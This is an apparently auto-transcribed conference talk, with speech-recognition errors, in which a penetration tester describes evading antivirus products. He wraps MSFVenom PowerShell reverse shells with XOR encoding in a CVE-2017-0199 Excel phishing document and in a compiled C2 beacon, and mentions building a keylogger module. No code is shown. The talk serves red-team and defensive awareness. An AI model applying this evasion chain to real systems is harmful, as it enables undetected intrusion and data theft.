PG - Bypassing Antivirus Engines using Open Sourced Malleable C2 Software, MSFVenom, Powershell and

first off when we apologize about the title lie it was up for about 36 hours when I came up with that idea for these submissions so it was interesting I just passed my CP was feeling a bit froggy and I was like you know what let's go ahead and just do something so I did that and the title came out a bit long anyways I kept it just to be concise with what I did for the submissions so anyways we'll just kind of go ahead and move on sorry I'm a bit like you know nervous so a little bit about me my name is Michael you can call me Vega that's my handle on pretty much everything but I have a

Twitter data cost I also have a website and former security currently just you know work wise I do penetration testing for medical devices for a company called BD off time I just like to do things not computerized cycle kind of get in nature realize there's other things to do besides soon just behind this lovely thing and I really wanted to give a giant thanks to again the people who I put through help for this my wife cam my son River and my daughter Lily because I was like a mess for like weeks you know just doing stuff so anyhow moving along so when you're entering a network for a red team or a penetration testing

engagement obviously if you're doing a black box test you're going to be coming from the outside in and using that kind of theory you know what's going to go wrong within as soon as you enter the bastion of any kind of castle there's guards those defenses those mechanisms to start to stop you same thing with any kind of computer there's going to be items that you have to emulate if you're doing a Red Team assessment with regards to threat actors and different ways to get your goals obtained again if you're doing a straight real-world scenario there will be some kind of systems in play an Tabares just something to try to block you normally there should be so one of

the things I was doing one day was just bored and I was like you know I I don't like that little thing that goes off and I compiled something so I'm just going to try to bypass the enterprise engine that how to my system so just looking at windows topography and if you think logically they're using Windows and in a lot of times when you go to a terminal and you just type es a power show you actually get the power show Pronk its 2018 a lot of people use PowerShell for good legitimate reasons for sistas administrations and things but the problem is that a lot of the users don't have any kind of real use for this kind

of system it's something that's not restricted but something that's available to them and it's a very big you know threat platform to attack and it's very rich because it's actually physically on the windows system natively very robust so my thought was again I just want to test these things I wanted to get past the antivirus engine I wanted to try to affect it using PowerShell something native to the system without trying to introduce any kind of other external tools and why do I want to do that I want to do something in memory I want to try to use less network traffic you know with the shuttling the information back and forth if I have something hosted on my

attacking machine and the client connects to it it's less traffic transferring back and forth and if I'm just dropping and executable also again PowerShell itself is very robust you can do basic tax and anything from complete TCP command shells and it just seems like a very good candidate to start poking out within the windows topographies so again looking at the what if my adversary is going to be running under the hood antivirus has a lot of different things but there's similarities between a lot of these engines if you go for the standard you know double click install you know push out to a hundred thousand clients or something a lot of times these antivirus have you know signatures sometimes they

say they don't have signatures they have modules but it's something to match a fingerprint of an actual file I still consider its signature based and a bit old but it's something that does exist a lot of times also depending on the infrastructure and what kind of antivirus engine you're deploying they'll be antivirus there'll be traffic analysis trying to determine malicious command and control software back and forth behavioral analysis in-memory sandbox you have various scanners to look for unsafe applications unwanted applications things like keyways also if you look into the windows topography there's an AMS eye scanner there's something that's gonna be able to hook into the Windows SDK to be able to scan locally executed PowerShell scripts and

try to determine if those occupations are malicious or not so again from Microsoft the MSI generally serves to integrate with your anti-malware AV product and it provides a closer look at those executed scripts so in the examples I'm going to show you these are just some antivirus engines I downloaded I tried to go for the business versions initially but if I like some of them were looks like you need like a Encyclopedia to actually launch the thing so I just I don't want to take the time but they are the fully updated clients so just going over just a couple examples this is just generic you know trying to bring an executable over to a machine now where people are

very familiar with things like Metasploit Metis people it's an easy connection back and forth it allows you to do your workload but as you see here transferring a mess what file is very detectable it's something that there is you know a lot of signatures based around you know the functionality Metasploit it's very well known so these will known things have a lot of items and signatures based around their functionality so again looking at this a PowerShell file was detected a PowerShell executable was detected meterpreter executable again easy detections this is an ESET system this one has every Bell and whistle turned on every kind of update it's actually currently update all the modules are actually currently updated everything's

fine so this is just executing a meterpreter reverse connection from client a to my attacking machine now the problem you see here is that unfortunately if you go back a bit that meterpreter session is still very much live the file itself the PowerShell file has been quarantined but unfortunately the meterpreter session is undetected so again you want to take a little further scan in the operating memory and this is something that actually most antivirus engines should be able to detect something that is very known something that they know I know they have signatures for that should be detected and operating memory as a running object and this is actually on all of their websites with marketing as to you know

what they have inclusively so again with this scenario just a very generic uh novice gated powershell verse TCP connection machine Aida machine B file gets detected that's fine you took the file but unfortunately you still have full control the machine on the back end so I'm not sure that that's really a good thing and it would be more towards the blue team like who's watching the you know logging to make sure that he would investigate that kind of object because a lot of people would take that at face value it quarantine date I'm good so moving along that was good but we're almost to the point where we want to be so again we won't be normally as

lucky in that example where we just get to execute a PowerShell script a lot of times we're going to have to do it remotely or we're going to have to use some kind of mechanism to be able to have a client execute the script for us we're not going to get that joy of being able to just drop a PowerShell script and just execute and I got the command so looking at that what is the one thing in a computer scenario that runs the computer it's the person so people are unfortunately very malleable and I use this this picture like of ton I've used it for years but it makes complete sense you can have

every single detection you know AI I have a machine-learning monster that will kill any antivirus and then on the other side you have this guy Dave Dave likes to click things you sent David email Dave's gonna open it Dave also happens to be the CEO so you're not gonna really tell Dave like you know you really shouldn't open that email address to you he opens whatever signs up for whatever uses his corporate email so again targeting the people and you know taking a look back a user training you know people are malleable they like to do things it's reciprocation you know I if I give you something of course you're going to want to be polite initially and

try to give something back so in this example again the some execution of powershell scripts from clients to attacker will go ahead and say that let's execute the script we conducted a fishing exercise we sent out an excel script or excel file to a large financial institution and they had it and we're like you know priming him to open it hey you know did you get my order you know hey I sent you the information for the stuff I've not gotten any information back can you please take a look at this file it's kind of immediate for my business keep them on the line give something to kind of go by but you can easily probably get

that person depending on their function to do the execution for you so in this scenario what I'm doing is I'm creating a just very generic and this again using Metasploit MSF venom PowerShell script that's using X 64 X soaring for the encoding so it's office gating the code a bit and it's just going to execute using CBE 2017 tax zero one nine nine but this is is the malicious HDA handlers and office documents it has been patched in Al I should say a word but unfortunately they left it open in Excel which is kind of interesting because it's like you know if you would fix the suite why don't you just do it all anyways it's still there it's still

valid and it still works so and this scenario what I did was I created the file and we're gonna host it on my attacking machine this is just going to be the powershell script that you can see right there that's going to be a reversed tcp connection from the client to my machine and i gonna so python simple HTTP server just serving up a HTTP traffic and then in again our fishing scenario you know we've sent the company you know they're lovely documents you know we got them on the line you know we're sent adding that urgency and as you see ii sets fully updated every modules on everything's good to go everything's updated the a

msi scanner all the suspicious all the anti stealth all the firewall settings literally turn to every single thing on and killed this vm but the problem that you'll notice is that when our unsuspecting user has gotten this file it's Jose clean and would be able to get past a lot of the filters that they have in the in the outlook now this document obviously doesn't require some user interaction as you saw right there there was a small thing that popped up and said you know obviously would you like to run excel ms excel dot exe you're opening Excel so yes you would and to the unsuspecting person especially you know the high impact financial industry

they'll go ahead and open in any way so you know everybody likes money you know sorry the Excel documents kind of J but you know money money money but excels a big document so you can hide a lot of stuff in like a lot of cells and if you notice right there now I have a reverse TCP connection from that client to my machine all by opening that excel file and if you go back to ESET again we scan the file nothing's there we've we've second it simulate fast forward then go forward and scan the operating memory and again trying to detect the object that's actually running an operating memory as an administrator nothing's there

so basically now you just used the CVE that's widely available put a PowerShell script in it executed in memory and then by paucity detections of the disk with all the antivirus and all the bells and whistles same thing with McAfee opened the same book it's the same exact code and what you'll notice is that it just opens that perfectly fine as it did before and you have that reversed TCP connection sitting on your attacking machine there goes the get and there's the attack so just taking a step back and just thinking you know how how do these tests go with antivirus vendors testing their protection mechanisms against like massive amounts of attacks normally what they'll do is on the on like say a

they'll have like a tester like you know these PC magazines that let's get a bunch of executables and drag them over and execute them and see how they do so using that kind of scenario I wanted to do the same thing and also want to show you some variants in the follow the text this is a standard Metasploit reverse TCP connection just PowerShell okay I'm sorry just an executable that I created just something generic MSF venom so as you can see 3766 vendors were able to detect it normally went up to load your palos but I need an example and honestly these payloads are very simple and they're easily recreated so these signatures these detections are pretty

standard but if you take that file and move it over to PowerShell there's one person that's detecting that file same things executable versus PowerShell so I wanted to kind of meld the two kind of try to combine them so what I did was I just thought you know what let's just go kick it in the face a lot of times these AV vendors will take their product and they'll just say you know what just throw everything at it so we'll dump a will give a thumb drive full of you know malicious software double click everyone see if we pass so that's what I thought I'd do what I did was I created an executable that is

based off of a malleable c2 software now for those not familiar with those kinds of software is basically command and control software's where you can change the traffic profiles to make it look like something else so a simple request and reply back from a client will look like something like Amazon they have a lot of these I think cobalt strike and various other frameworks there's a lot of open source ones Empire but I was looking through github and I found an interesting one that I'd like and I forked it on github and I'm still developing some modules for it but I was like ok let's go ahead and take something that's completely out of left

field create an executable based off of that so we're taking the PowerShell command putting that into MSF venom as a Windows command and then obfuscating that Windows command with X 64 X o-ring and then taking that C code and then placing that into a skeleton executable and then just dragging it over to the machine so now that executable is going to be executing the underlying PowerShell script and then you should have magic release detections of if you're going to detect something and use all the bells and whistles of the AV system that you say you have so using this c2 software I just set up a quick listener my local IP address so that basically it would

connect back to me and it would give me access to it once I got the reverse connection and right there you can see that it's generating a PowerShell command now the powershell command again is base64 and encoded so it's needs to be inflated before execution but what i'm doing is taking that and i'm piping that just directly into the powershell command and then taking that and making that c code as the output and then creating the beacon dot c and then once that's created we now have this lovely shell code that we can put into our skeleton executable right over here and then this skeleton executable again in what this thing is a visual studio we'll just go ahead and

compile it and to make it into an executable so we now have the executable compiled and let's go ahead and build it so you don't want to see me ever on the building but basically the only thing you need to do with this and I'm actually going to publish this on my website later after here I'll just put all those schematics and everything so all you have to do is take your C code pipe it into the framework you add the byte size for your payload it expands and it executes perfectly fine so moving on take the 64-bit executable and then here is our execution so sorry the threats were earlier from detection when I was playing around but as you can see

right here we'll go ahead and scan it was so close to file scan everything's clean go ahead and run it again beacon executes and nothing but if you look at your clients list you now have a win 10 client now again what's the harm in that you now have a Windows 10 client that has the ability to accepting commands from an external agent send them back and forth with encrypted SSL traffic and make it look like Amazon and so again this took all the bells and whistles of the AV and kind of put it to its test to say did your did your botnet detection tectus did your signature detectives did your you know heuristic analysis or any

of yours in-memory sandboxing detectives and the answer's no and unfortunately that just due to the kind of not unpopularity but the pervasiveness of power show usage and the ability to do multiple things and just how PowerShell is growing and they're not really again limiting it in the enterprise and we personally I've seen many assessments where I've gone into and you know you mentioned just everybody have access to PowerShell and I see a lot of the CEOs like you know get quiet and they like you know talk amongst themselves and they start writing stuff down like and that's not good because it's like you that your 20 18 and some of these infrastructures are actually pretty

critical so it's more of an awakening to not just deploy one thing but make sure that you're doing things in layers and looking at the best solutions and actually testing them and maybe taking them apart and seeing if their mechanisms are really as good as they say then moving along again this is just McAfee same thing everything scans everything goes in now the beauty of this kind of framework is that this particular framework actually gives you all the access to all the PowerShell modules from nishang Empire and powersploit and any other PowerShell add-on you can think of you can just add into the appropriate folder so it makes it nice and neat shaking down pouches

and do whatever you want up to that point and believe actually that was about it oh sorry there was one more slide state actors and the people that are actually using this looking a little bit into the topic I was researching you know on miters attack website looking at different TTP's for various adversary groups a lot of times again if you'll notice like the various app groups they are utilizing these kinds of frameworks and group called bronze Butler was observed using it in 2017 and a lot more groups are actually utilizing these kinds of cuts my friend works actually effect systems and until Microsoft comes up with some other kind of scripting engine that's going to be taken advantage of in the

same way then this is going to be the kind of de-facto and the things that we're going to have to look for in the future so questions who's going to say there had to be at least one can you post a website up

you want I got cards up here and even this happen even has the website on it okay it's gonna be under the research section thank you slow to answer a question okay gotcha the Madonna thing sorry abstain from this yes sir did you test against any of the EDR tools were they any better at detecting I do have access to some media art tools I did not publish in here I did test against two that I used to work with personally and professionally no they didn't do too grand one of them was able to locate obviously the traversal of files but the other one did not detect anything with regards to information going out or even the

execution of the PowerShell scripting initially which was kind of discerning also and one of the examples of a showing with regards to the execution of the PowerShell scripting with ESET or actually with any of them the ones that went through oddly enough when you did not have the AV installed the Windows Defender located the actual CDE but you install the AV and it didn't so basically you're lessening his security by adding more vendors which was interesting in himself so do you have any examples of the number traffic before and after you put it through the c2 oh yes like pcaps I do actually something I did and I was so nervous I actually spaced on that but

it is right here and yes right here so right here you see that client hello a client hello is going to again Amazon and if you look at the traffic further down so I kind of like messed up the traffic just a command-and-control portion there's not really much you can get out of there all the traffic looks very benign and unless you're really monitoring it again it's going to be the monitoring of this and the red team or sorry the blue team's tool yeah [Music] mallets [Music] let's see besides a bit pre-recorded so you wanted to see the the SIRT like under yeah yeah I can't it's a it's live it's not live demo oh it's a video I was

like I think I think I get what you're saying but like I'm trying to determine is he like pranking me or like just cuz I'm really nervous I'm like I'm like trying to actually do this is that guy I thought it was gonna get it to work for a second yeah I just you had Vega see - you're Vega so you did you develop that see - yeah it was a fork off github and I modified it because I didn't want to let like put the person on blast it created the original and also I'm going to develop it a little bit differently with regards to the modules that are currently active there's some items that needed to be

completed I've nearly got the keylogger completed I just need to clean it up a little bit with the traffic and then it will be ready [Music] yeah cobalt strike never got back to my request for a trial I tried all right I guess you'll be available for any other questions yet no I'll be here cool